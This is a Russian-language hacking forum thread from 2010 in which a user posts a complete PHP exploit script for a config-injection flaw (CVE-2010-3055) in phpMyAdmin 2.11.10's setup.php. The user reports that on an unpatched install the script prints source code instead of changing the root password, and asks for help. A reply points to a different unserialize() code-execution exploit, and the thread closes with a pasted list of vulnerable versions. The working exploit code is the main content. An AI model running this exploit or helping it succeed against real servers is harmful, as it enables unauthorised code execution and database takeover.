Вопрос по phpmyadmin

Discussion in 'Песочница' started by Lijzer, 5 Nov 2010.

  1. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Вот ссылка на уязвимость http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3055
    Вот эксплойт
    Code:
    <?php
// this is an exploit code for phpMyAdmin 2.11.10

$target_url = "http://host/path/phpmyadmin/script/setup.php";

$token = null;

// request 1
$res = get_response();

// request 2 (add server)
$res = get_response('POST', "token=$token&action=addserver");

// request 3 (save to session)
$res = get_response('POST', "token=$token&action=addserver_real&host=localhost&connect_type=tcp&extension=mysql&auth_type=config&user=root&password=1&submit_save=Add&AllowDeny_order=1&AllowDeny[a][b]['.phpinfo().']=1");

// request 4 (save to file)
$res = get_response('POST', "token=$token&action=save");

// request 5 (load file)
$res = get_response('POST', "token=$token&action=load");
var_dump($res);


function get_response($method='GET', $body=null) {
    global $target_url, $token;
    static $ch = null;

    if ($ch === null) $ch = curl_init();

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_URL, $target_url);

    if ($method == 'POST') {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
    }

    curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookie.txt');
    curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookie.txt');

    $res = curl_exec($ch);
    $token = get_token($res);

    return $res;
}

function get_token($s) {
    if (preg_match('#name="token" value="(.*?)"#', $s, $m)) {
        return $m[1];
    }
}
    Собственно есть pma 2.11.10 и точно не пропатченная, запускаю сплоит, выводит исходники setup.php, а пароль рута не меняется. Помогите разобраться
     
    #1 Lijzer, 5 Nov 2010
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    693
    Likes Received:
    727
    Reputations:
    948
    unserialize() arbitrary PHP code execution exploit работает в phpMyAdmin <= 2.11.9
     
    #2 Strilo4ka, 11 Nov 2010
    Last edited: 11 Nov 2010
  3. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    на securityfocus.com пишут
    Code:
    Bugtraq ID: 	42591
Class: 	Input Validation Error
CVE: 	CVE-2010-3055
Remote: 	Yes
Local: 	No
Published: 	Aug 20 2010 12:00AM
Updated: 	Oct 25 2010 08:58AM
Credit: 	Takeshi Terada
Vulnerable: 	phpMyAdmin phpMyAdmin 2.11.10
phpMyAdmin phpMyAdmin 2.11.9 4
phpMyAdmin phpMyAdmin 2.11.9 .6
phpMyAdmin phpMyAdmin 2.11.9 .2
phpMyAdmin phpMyAdmin 2.11.9 .1
phpMyAdmin phpMyAdmin 2.11.9
phpMyAdmin phpMyAdmin 2.11.8
phpMyAdmin phpMyAdmin 2.11.7
phpMyAdmin phpMyAdmin 2.11.5
phpMyAdmin phpMyAdmin 2.11.4
phpMyAdmin phpMyAdmin 2.11.1
phpMyAdmin phpMyAdmin 2.11.9.5.
phpMyAdmin phpMyAdmin 2.11.9.5
phpMyAdmin phpMyAdmin 2.11.9.3
phpMyAdmin phpMyAdmin 2.11.8.1
phpMyAdmin phpMyAdmin 2.11.5.2
phpMyAdmin phpMyAdmin 2.11.5.1
phpMyAdmin phpMyAdmin 2.11.2.2
phpMyAdmin phpMyAdmin 2.11.2.1
phpMyAdmin phpMyAdmin 2.11.10-dev
phpMyAdmin phpMyAdmin 2.11.1.2
phpMyAdmin phpMyAdmin 2.11.1.1
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 4.0
Debian Linux 5.0 sparc
Debian Linux 5.0 s/390
Debian Linux 5.0 powerpc
Debian Linux 5.0 mipsel
Debian Linux 5.0 mips
Debian Linux 5.0 m68k
Debian Linux 5.0 ia-64
Debian Linux 5.0 ia-32
Debian Linux 5.0 hppa
Debian Linux 5.0 armel
Debian Linux 5.0 arm
Debian Linux 5.0 amd64
Debian Linux 5.0 alpha
Debian Linux 5.0
    Это совсем разные уязвимости
     
    #3 Lijzer, 12 Nov 2010
    Last edited: 12 Nov 2010
(You must log in or sign up to post here.)